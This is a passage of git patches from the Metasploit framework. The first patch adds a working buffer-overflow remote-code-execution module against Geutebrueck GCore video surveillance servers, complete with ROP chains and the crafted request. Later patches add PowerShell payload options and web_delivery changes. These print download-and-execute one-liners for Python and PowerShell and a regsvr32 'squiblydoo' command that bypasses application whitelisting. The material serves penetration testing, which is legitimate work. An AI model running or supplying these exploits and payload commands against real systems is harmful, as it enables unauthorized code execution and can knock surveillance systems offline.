From d5fd620fbb8eb497ed2bc2e53460d4b298eda599 Mon Sep 17 00:00:00 2001 From: Maurice Popp Date: Tue, 14 Feb 2017 11:21:36 +0100 Subject: [PATCH 001/254] Add files via upload --- .../http/geutebrueck_gcore_x64_rce_bo.rb | 286 ++++++++++++++++++ 1 file changed, 286 insertions(+) create mode 100644 modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb diff --git a/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb new file mode 100644 index 0000000000..c29de50090 --- /dev/null +++ b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb @@ -0,0 +1,286 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'nokogiri' +require 'open-uri' + +class MetasploitModule < Msf::Exploit::Remote + include Msf::Exploit::Remote::Tcp + + Rank = NormalRanking + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE', + 'Description' => 'This module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe). The vulnerable webserver is running on Port 13003 and Port 13004, does not require authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY).', + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Luca Cappiello', + 'Maurice Popp' + ], + 'References' => + [ + ['www.geutebrueck.com', ''] + ], + 'Platform' => 'win', + 'Targets' => + [ + ['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X86_64 }], + ['GCore 1.3.8.42, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X86_64 }], + ['GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X86_64 }] + ], + 'Payload' => + { + 'Space' => '2000' + }, + 'Privileged' => false, + 'DisclosureDate' => '2017-01-24', + 'DefaultTarget' => 0)) + end + + def fingerprint + print_status('Trying to fingerprint server with http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml...') + @doc = Nokogiri::XML(open('http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml')) + statistics = @doc.css('modulestate') + statistics.each do |x| + if (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.3.8.42') + mytarget = targets[1] + print_status("Vulnerable version detected: #{mytarget.name}") + return Exploit::CheckCode::Appears, mytarget + elsif (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.4.2.37') + mytarget = targets[2] + print_status("Vulnerable version detected: #{mytarget.name}") + return Exploit::CheckCode::Appears, mytarget + end + end + print_status('Statistics Page under http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml is not available.') + print_status("Make sure that you know the exact version, otherwise you'll knock out the service.") + print_status('In the default configuration the service will restart after 1 minute and after the third crash the server will reboot!') + print_status('After a crash, the videosurveillance system can not recover properly and stops recording.') + [Exploit::CheckCode::Unknown, nil] + end + + def check + fingerprint + end + + def ropchain(target) + if target.name.include? '1.3.8.42' + print_status('Preparing ROP chain for target 1.3.8.42!') + + # 0x140cd00a9 | add rsp, 0x10 ; ret + # This is needed because the next 16 bytes are sometimes messed up. + overwrite = [0x140cd00a9].pack('Q<') + + # These bytes "\x43" are sacrificed ; we align the stack to jump over this messed up crap. + stack_align = "\x43" * 16 + + # We have 40 bytes left to align our stack! + # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations + # and to restore it. + # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. + + # 0x1404e5cbf: mov edx, esp ; ret + stack_align += [0x1404e5cbf].pack('Q<') + + # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. + # We pop -XXXXX as \xxxxxxxxx to rax + # 0x14013db94 pop rax ; ret + stack_align += [0x14013db94].pack('Q<') + stack_align += [0xFFFFFFFFFFFFF061].pack('Q<') + + # Our value is enough. + # 0x1407dc547 | add rax,rdx ; ret + stack_align += [0x1407dc547].pack('Q<') + + # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back. + # 0x140ce9ac0 | mov rsp, rax ; ..... ; ret + stack_align += [0x140ce9ac0].pack('Q<') + + # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. + # We want RCX to hold the value for VP Argument "Address of Shellcode" + # 0x140cc2234 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; + rop = '' + rop += [0x140cc2234].pack('Q<') + rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; + # 0x1400ae2ae | POP RDX; RETN + # 0x...1000 | Value for VP "Size of Memory" + rop += [0x1400ae2ae].pack('Q<') + rop += [0x0000000000000400].pack('Q<') + + # 0x14029dc6e: | POP R8; RET + # 0x...40 | Value for VP "Execute Permissions" + rop += [0x14029dc6e].pack('Q<') + rop += [0x0000000000000040].pack('Q<') + + # 0x1400aa030 | POP R9; RET + # 0x1409AE1A8 is the .data section of gcore + rop += [0x1400aa030].pack('Q<') + rop += [0x1409AE1A8].pack('Q<') + + # 0x140b5927a: xor rax, rax ; ret + rop += [0x140b5927a].pack('Q<') + + # 0x1402ce220 pop rax ; ret + # 0x140d752b8 | VP Stub IAT Entry + rop += [0x1402ce220].pack('Q<') + rop += [0x140d752b8].pack('Q<') + + # 0x1407c6b3b mov rax, qword [rax] ; ret ; + rop += [0x1407c6b3b].pack('Q<') + + # 0x140989c41 push rax; ret + rop += [0x140989c41].pack('Q<') + + # 0x1406d684d jmp rsp + rop += [0x1406d684d].pack('Q<') + + [rop, overwrite, stack_align] + + elsif target.name.include? '1.4.2.37' + print_status('Preparing ROP chain for target 1.4.2.37!') + + # 0x140cd9759 | add rsp, 0x10 ; ret + # This is needed because the next 16 bytes are sometimes messed up. + overwrite = [0x140cd9759].pack('Q<') + + # These bytes "\x43" are sacrificed ; we align the stack to jump over this. + stack_align = "\x43" * 16 + + # We have 40 bytes left to align our stack! + # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations + # and to restore it. + # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. + + # 0x1404f213f: mov edx, esp ; ret + stack_align += [0x1404f213f].pack('Q<') + + # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. + # We pop -XXXXX as \xxxxxxxxx to rax + # 0x14000efa8 pop rax ; ret + stack_align += [0x14000efa8].pack('Q<') + stack_align += [0xFFFFFFFFFFFFF061].pack('Q<') + + # Our value is enough. + # 0x140cdfe65 | add rax,rdx ; ret + stack_align += [0x140cdfe65].pack('Q<') + + # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back. + # 0x140cf3110 | mov rsp, rax ; ..... ; ret + stack_align += [0x140cf3110].pack('Q<') + + # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. + # We want RCX to hold the value for VP Argument "Address of Shellcode" + # 0x140ccb984 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; + rop = '' + rop += [0x140ccb984].pack('Q<') + rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; + # 0x14008f7ec | POP RDX; RETN + # 0x...1000 | Value for VP "Size of Memory" + rop += [0x14008f7ec].pack('Q<') + rop += [0x0000000000000400].pack('Q<') + + # 0x140a88f81: | POP R8; RET + # 0x...40 | Value for VP "Execute Permissions" + rop += [0x140a88f81].pack('Q<') + rop += [0x0000000000000040].pack('Q<') + + # 0x1400aa030 | POP R9; RET + # 0x... | Value for VP "Writeable location". Not sure if needed? + # 0x140FB5000 is the .data section of gcore; let's test with this writable section... + rop += [0x1400aa030].pack('Q<') + rop += [0x140FB5000].pack('Q<') + + # 0x140ccea2f: xor rax, rax ; et + rop += [0x140ccea2f].pack('Q<') + + # 0x14000efa8 pop rax ; ret + # 0x140d83268 | VP Stub IAT Entry + rop += [0x14000efa8].pack('Q<') + rop += [0x140d83268].pack('Q<') + + # 0x14095b254 mov rax, qword [rax] ; ret ; + rop += [0x14095b254].pack('Q<') + + # 0x140166c46 push rax; ret + rop += [0x140166c46].pack('Q<') + + # 0x140cfb98d jmp rsp + rop += [0x140cfb98d].pack('Q<') + + [rop, overwrite, stack_align] + + else + print_status('ROP chain for this version not (yet) available or the target is not vulnerable.') + + end + end + + def exploit + if target['auto'] + checkcode, target = fingerprint + if checkcode.to_s.include? 'unknown' + print_status('No vulnerable Version detected - exploit aborted.') + else + target_rop, target_overwrite, target_stack_align = ropchain(target) + begin + connect + print_status('Crafting Exploit...') + + http_req = 'GET /' + buffer_200 = "\x41" * 200 + rop = target_rop + payload.encoded + buffer_1823 = "\x41" * 1823 + overwrite = target_overwrite + stack_align = target_stack_align + + exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align + print_status('Exploit ready for sending...') + sock.put(exploit, 'Timeout' => 20) + print_status('Exploit sent!') + buf = sock.get_once || '' + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") + ensure + print_status('Closing socket.') + disconnect + end + end + + else + print_status('No auto detection - be sure to choose the right version! Otherwise the service will crash, the system reboots and leaves the surveillance software in an undefined status.') + print_status("Selected version: #{self.target.name}") + target_rop, target_overwrite, target_stack_align = ropchain(self.target) + begin + connect + print_status('Crafting Exploit...') + + http_req = 'GET /' + buffer_200 = "\x41" * 200 + rop = target_rop + payload.encoded + buffer_1823 = "\x41" * 1823 + overwrite = target_overwrite + stack_align = target_stack_align + + exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align + print_status('Exploit ready for sending...') + sock.put(exploit, 'Timeout' => 20) + print_status('Exploit sent!') + # sleep(10) + buf = sock.get_once || '' + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") + ensure + print_status('Closing socket.') + disconnect + end + + end + end +end From 1a3fe02db1ea75fa4f544c2c24c1139b5fa0d89f Mon Sep 17 00:00:00 2001 From: RageLtMan Date: Sun, 16 Jul 2017 04:20:46 -0400 Subject: [PATCH 002/254] Psexec via PSH related fixes Implement removal of comspec and use of the noninteractive option in powershell payloads. This is the Msf side of #6 for rex-powershell. Testing: In-house testing on 2016 standard edition and win10, 201707 revs. --- lib/msf/core/exploit/powershell.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb index eac730b97d..906d67bd4d 100644 --- a/lib/msf/core/exploit/powershell.rb +++ b/lib/msf/core/exploit/powershell.rb @@ -14,6 +14,8 @@ module Exploit::Powershell OptBool.new('Powershell::sub_vars', [true, 'Substitute variable names', false]), OptBool.new('Powershell::sub_funcs', [true, 'Substitute function names', false]), OptBool.new('Powershell::exec_in_place', [true, 'Produce PSH without executable wrapper', false]), + OptBool.new('Powershell::remove_comspec', [true, 'Produce script calling powershell directly', false]), + OptBool.new('Powershell::noninteractive', [true, 'Execute powershell without interaction', true]), OptBool.new('Powershell::encode_final_payload', [true, 'Encode final payload for -EncodedCommand', false]), OptBool.new('Powershell::encode_inner_payload', [true, 'Encode inner payload for -EncodedCommand', false]), OptBool.new('Powershell::use_single_quotes', [true, 'Wraps the -Command argument in single quotes', false]), @@ -220,9 +222,8 @@ module Exploit::Powershell # # @return [String] Powershell command line with payload def cmd_psh_payload(pay, payload_arch, opts = {}) - options.validate(datastore) - - %i[persist prepend_sleep exec_in_place encode_final_payload encode_inner_payload use_single_quotes no_equals method].map do |opt| + %i[persist prepend_sleep exec_in_place encode_final_payload encode_inner_payload + remove_comspec noninteractive use_single_quotes no_equals method].map do |opt| opts[opt] ||= datastore["Powershell::#{opt}"] end From 33a06faadb0370f5e8b4cc9f09530a8288744a7c Mon Sep 17 00:00:00 2001 From: RageLtMan Date: Tue, 18 Jul 2017 03:34:02 -0400 Subject: [PATCH 003/254] Remove use_single_quotes option from Msf namespace Internally wrapped lines of powershell built by :cmd_psh_payload in the Rex namespace require being able to place wrapping quotes in different logical places for :generate_psh_command_line and :run_hidden_psh methods. Using single quotes in the Arguments parameter of the hidden PSH runner and double quotes after the -Command flag maintains allows us to wrap the outer command in double quotes, while properly ecaping and wrapping the arguments parameter for PSH execution in single quotes. This isn't ideal, in a perfect world we'd be escaping all nested quotes and escape chars of any type valid for PSH. However, that would require more manual testing than anyone has time for (now). --- lib/msf/core/exploit/powershell.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb index 906d67bd4d..d3a3bad825 100644 --- a/lib/msf/core/exploit/powershell.rb +++ b/lib/msf/core/exploit/powershell.rb @@ -18,7 +18,6 @@ module Exploit::Powershell OptBool.new('Powershell::noninteractive', [true, 'Execute powershell without interaction', true]), OptBool.new('Powershell::encode_final_payload', [true, 'Encode final payload for -EncodedCommand', false]), OptBool.new('Powershell::encode_inner_payload', [true, 'Encode inner payload for -EncodedCommand', false]), - OptBool.new('Powershell::use_single_quotes', [true, 'Wraps the -Command argument in single quotes', false]), OptBool.new('Powershell::no_equals', [true, 'Pad base64 until no "=" remains', false]), OptEnum.new('Powershell::method', [true, 'Payload delivery method', 'reflection', %w[net reflection old msil]]) ] @@ -223,7 +222,7 @@ module Exploit::Powershell # @return [String] Powershell command line with payload def cmd_psh_payload(pay, payload_arch, opts = {}) %i[persist prepend_sleep exec_in_place encode_final_payload encode_inner_payload - remove_comspec noninteractive use_single_quotes no_equals method].map do |opt| + remove_comspec noninteractive no_equals method].map do |opt| opts[opt] ||= datastore["Powershell::#{opt}"] end From c187f709dc7dc99c11aae26bc85cdc57a09ca0c2 Mon Sep 17 00:00:00 2001 From: M4P0 Date: Fri, 21 Jul 2017 11:37:12 +0200 Subject: [PATCH 004/254] Update geutebrueck_gcore_x64_rce_bo.rb Review changes with msftidy. --- .../windows/http/geutebrueck_gcore_x64_rce_bo.rb | 15 +++++++-------- 1 file changed, 7 insertions(+), 8 deletions(-) diff --git a/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb index c29de50090..c3ebbd14b8 100644 --- a/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb +++ b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'nokogiri' require 'open-uri' @@ -24,21 +23,22 @@ class MetasploitModule < Msf::Exploit::Remote ], 'References' => [ - ['www.geutebrueck.com', ''] + ['EDB','41153'], + ['URL','www.geutebrueck.com'] ], 'Platform' => 'win', 'Targets' => [ - ['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X86_64 }], - ['GCore 1.3.8.42, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X86_64 }], - ['GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X86_64 }] + ['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X64 }], + ['GCore 1.3.8.42, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}], + ['GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}] ], 'Payload' => { 'Space' => '2000' }, - 'Privileged' => false, - 'DisclosureDate' => '2017-01-24', + 'Privileged' => true, + 'DisclosureDate' => 'Jan 24 2017', 'DefaultTarget' => 0)) end @@ -272,7 +272,6 @@ class MetasploitModule < Msf::Exploit::Remote print_status('Exploit ready for sending...') sock.put(exploit, 'Timeout' => 20) print_status('Exploit sent!') - # sleep(10) buf = sock.get_once || '' rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") From e787d433444721e7f02b932d2ffe9485a0870376 Mon Sep 17 00:00:00 2001 From: RageLtMan Date: Sat, 22 Jul 2017 02:36:07 -0400 Subject: [PATCH 005/254] Implement wrap_double_quotes in Msf PSH namespace This is the Msf side of Rex Powershell #7 --- lib/msf/core/exploit/powershell.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb index d3a3bad825..3686faa8cd 100644 --- a/lib/msf/core/exploit/powershell.rb +++ b/lib/msf/core/exploit/powershell.rb @@ -18,6 +18,7 @@ module Exploit::Powershell OptBool.new('Powershell::noninteractive', [true, 'Execute powershell without interaction', true]), OptBool.new('Powershell::encode_final_payload', [true, 'Encode final payload for -EncodedCommand', false]), OptBool.new('Powershell::encode_inner_payload', [true, 'Encode inner payload for -EncodedCommand', false]), + OptBool.new('Powershell::wrap_double_quotes', [true, 'Wraps the -Command argument in single quotes', true]), OptBool.new('Powershell::no_equals', [true, 'Pad base64 until no "=" remains', false]), OptEnum.new('Powershell::method', [true, 'Payload delivery method', 'reflection', %w[net reflection old msil]]) ] @@ -216,13 +217,13 @@ module Exploit::Powershell # powershell script # @option opts [Boolean] :remove_comspec Removes the %COMSPEC% # environment variable at the start of the command line - # @option opts [Boolean] :use_single_quotes Wraps the -Command - # argument in single quotes unless :encode_final_payload + # @option opts [Boolean] :wrap_double_quotes Wraps the -Command + # argument in double quotes unless :encode_final_payload # # @return [String] Powershell command line with payload def cmd_psh_payload(pay, payload_arch, opts = {}) %i[persist prepend_sleep exec_in_place encode_final_payload encode_inner_payload - remove_comspec noninteractive no_equals method].map do |opt| + remove_comspec noninteractive wrap_double_quotes no_equals method].map do |opt| opts[opt] ||= datastore["Powershell::#{opt}"] end From 1a9a942c1fb5ea8fa8c670cb5fe5d419a1b5aa1f Mon Sep 17 00:00:00 2001 From: Adam Cammack Date: Mon, 7 Aug 2017 13:31:46 -0500 Subject: [PATCH 006/254] Add external module template for capture servers --- lib/msf/core/modules/external/shim.rb | 15 ++++++++--- .../external/templates/capture_server.erb | 27 +++++++++++++++++++ 2 files changed, 38 insertions(+), 4 deletions(-) create mode 100644 lib/msf/core/modules/external/templates/capture_server.erb diff --git a/lib/msf/core/modules/external/shim.rb b/lib/msf/core/modules/external/shim.rb index 4c47d945c8..4b64d8871f 100644 --- a/lib/msf/core/modules/external/shim.rb +++ b/lib/msf/core/modules/external/shim.rb @@ -9,6 +9,8 @@ class Msf::Modules::External::Shim case mod.meta['type'] when 'remote_exploit_cmd_stager' remote_exploit_cmd_stager(mod) + when 'capture_server' + capture_server(mod) end end @@ -26,10 +28,6 @@ class Msf::Modules::External::Shim meta[:name] = mod.meta['name'].dump meta[:description] = mod.meta['description'].dump meta[:authors] = mod.meta['authors'].map(&:dump).join(",\n ") - meta[:date] = mod.meta['date'].dump - meta[:references] = mod.meta['references'].map do |r| - "[#{r['type'].upcase.dump}, #{r['ref'].dump}]" - end.join(",\n ") meta[:options] = mod.meta['options'].map do |n, o| "Opt#{o['type'].capitalize}.new(#{n.dump}, @@ -39,11 +37,15 @@ class Msf::Modules::External::Shim end def self.mod_meta_exploit(mod, meta = {}) + meta[:date] = mod.meta['date'].dump meta[:wfsdelay] = mod.meta['wfsdelay'] || 5 meta[:privileged] = mod.meta['privileged'].inspect meta[:platform] = mod.meta['targets'].map do |t| t['platform'].dump end.uniq.join(",\n ") + meta[:references] = mod.meta['references'].map do |r| + "[#{r['type'].upcase.dump}, #{r['ref'].dump}]" + end.join(",\n ") meta[:targets] = mod.meta['targets'].map do |t| "[#{t['platform'].dump} + ' ' + #{t['arch'].dump}, {'Arch' => ARCH_#{t['arch'].upcase}, 'Platform' => #{t['platform'].dump} }]" end.join(",\n ") @@ -56,4 +58,9 @@ class Msf::Modules::External::Shim meta[:command_stager_flavor] = mod.meta['payload']['command_stager_flavor'].dump render_template('remote_exploit_cmd_stager.erb', meta) end + + def self.capture_server(mod) + meta = mod_meta_common(mod) + render_template('capture_server.erb', meta) + end end diff --git a/lib/msf/core/modules/external/templates/capture_server.erb b/lib/msf/core/modules/external/templates/capture_server.erb new file mode 100644 index 0000000000..cbcb4735b8 --- /dev/null +++ b/lib/msf/core/modules/external/templates/capture_server.erb @@ -0,0 +1,27 @@ +require 'msf/core/modules/external/bridge' +require 'msf/core/module/external' + +class MetasploitModule < Msf::Auxiliary + # include Msf::Auxiliary::Report + include Msf::Module::External + + def initialize + super({ + <%= common_metadata meta %> + 'Actions' => [ ['Capture'] ], + 'PassiveActions' => ['Capture'], + 'DefaultAction' => 'Capture' + }) + + register_options([ + <%= meta[:options] %> + ]) + end + + def run + print_status("Starting server...") + mod = Msf::Modules::External::Bridge.open(<%= meta[:path] %>) + mod.run(datastore) + wait_status(mod) + end +end From e7b4cb71b1cd6bb4f3c7c0b5a945b6d852573d14 Mon Sep 17 00:00:00 2001 From: g0tmi1k Date: Wed, 6 Sep 2017 12:27:04 +0100 Subject: [PATCH 007/254] Add PSH-Proxy to multi/script/web_delivery --- modules/exploits/multi/script/web_delivery.rb | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index 9adc1dacb4..26054b2f9d 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -62,6 +62,12 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 19 2013' )) + + register_advanced_options( + [ + OptBool.new('PSH-Proxy', [ true, 'PowerShell - Use the system proxy', true ]) + ], self.class + ) end def on_request_uri(cli, _request) @@ -89,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote print_line("python -c \"import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());\"") when 'PSH' ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl - download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url) + download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url)) download_and_run = "#{ignore_cert}#{download_string}" print_line generate_psh_command_line( noprofile: true, From b884705a9350f3eb8712db820d165d2859b9cdd0 Mon Sep 17 00:00:00 2001 From: g0tmi1k Date: Wed, 6 Sep 2017 12:35:52 +0100 Subject: [PATCH 008/254] regsvr32_applocker_bypass_server -> web_delivery --- modules/exploits/multi/script/web_delivery.rb | 69 +++++++++++++++---- .../misc/regsvr32_applocker_bypass_server.rb | 3 + 2 files changed, 57 insertions(+), 15 deletions(-) diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index 26054b2f9d..11a4345eb4 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -15,22 +15,31 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Script Web Delivery', 'Description' => %q( - This module quickly fires up a web server that serves a payload. - The provided command will start the specified scripting language interpreter and then download and execute the - payload. The main purpose of this module is to quickly establish a session on a target - machine when the attacker has to manually type in the command himself, e.g. Command Injection, - RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not - write to disk so it is less likely to trigger AV solutions and will allow privilege - escalations supplied by Meterpreter. When using either of the PSH targets, ensure the - payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute - x86 payloads on x64 machines. + This module quickly fires up a web server that serves a payload. + The provided command which will allow for a payload to download and execute. + It will do it either specified scripting language interpreter or "squiblydoo" via regsvr32.exe + for bypassing application whitelisting. The main purpose of this module is to quickly establish + a session on a target machine when the attacker has to manually type in the command: + e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution. + This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege + escalations supplied by Meterpreter. + + When using either of the PSH targets, ensure the payload architecture matches the target computer + or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines. + + Regsvr32 uses "squiblydoo" technique for bypassing application whitelisting. + The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included + PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute) + can occur on the same port. ), 'License' => MSF_LICENSE, 'Author' => [ 'Andrew Smith "jakx" ', 'Ben Campbell', - 'Chris Campbell' # @obscuresec - Inspiration n.b. no relation! + 'Chris Campbell', # @obscuresec - Inspiration n.b. no relation! + 'Casey Smith', # AppLocker bypass research and vulnerability discovery (@subTee) + 'Trenton Ivey', # AppLocker MSF Module (kn0) ], 'DefaultOptions' => { @@ -41,7 +50,8 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'], ['URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/'], ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'], - ['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'] + ['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'], + ['URL', 'http://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'], ], 'Platform' => %w(python php win), 'Targets' => @@ -57,6 +67,10 @@ class MetasploitModule < Msf::Exploit::Remote ['PSH', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64] + }], + ['Regsvr32', { + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64] }] ], 'DefaultTarget' => 0, @@ -71,15 +85,21 @@ class MetasploitModule < Msf::Exploit::Remote end def on_request_uri(cli, _request) - print_status('Delivering Payload') - if target.name.include? 'PSH' + if _request.raw_uri =~ /\.sct$/ + print_status("Handling .sct Request") + psh = gen_psh(get_uri) + data = gen_sct_file(psh) + send_response(cli, data, 'Content-Type' => 'text/plain') + elsif target.name.include? 'PSH' or target.name.include? 'Regsvr32' + print_status("Delivering Payload") data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true ) else - data = %Q(#{payload.encoded} ) + print_status("Delivering Payload") + data = %Q(#{payload.encoded}) end send_response(cli, data, 'Content-Type' => 'application/octet-stream') end @@ -94,14 +114,33 @@ class MetasploitModule < Msf::Exploit::Remote print_line('Python:') print_line("python -c \"import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());\"") when 'PSH' + print_line gen_psh(url) + when 'Regsvr32' + print_line("regsvr32 /s /n /u /i:#{url}.sct scrobj.dll") + end + end + + + def gen_psh(url) ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url)) download_and_run = "#{ignore_cert}#{download_string}" print_line generate_psh_command_line( + return generate_psh_command_line( noprofile: true, windowstyle: 'hidden', command: download_and_run ) end end -end + + + def rand_class_id + "#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}" + end + + + def gen_sct_file(command) + %{} + end +end \ No newline at end of file diff --git a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb index bb12511682..1143b831a5 100644 --- a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb +++ b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb @@ -8,6 +8,9 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpServer + include Msf::Module::Deprecated + + deprecated(Date.new(2018, 3, 5), 'exploits/multi/script/web_delivery.rb') def initialize(info = {}) super(update_info(info, From 96f7012fe711c5b22bdb4209dc693575be85b680 Mon Sep 17 00:00:00 2001 From: g0tmi1k Date: Wed, 6 Sep 2017 13:17:28 +0100 Subject: [PATCH 009/254] Code clean up (URLs, ordering and printing) --- modules/exploits/multi/script/web_delivery.rb | 63 ++++++++++--------- 1 file changed, 32 insertions(+), 31 deletions(-) diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index 11a4345eb4..5b652e1a7c 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -47,11 +47,11 @@ class MetasploitModule < Msf::Exploit::Remote }, 'References' => [ - ['URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'], - ['URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/'], + ['URL', 'https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'], + ['URL', 'https://www.pentestgeek.com/2013/07/19/invoke-shellcode/'], ['URL', 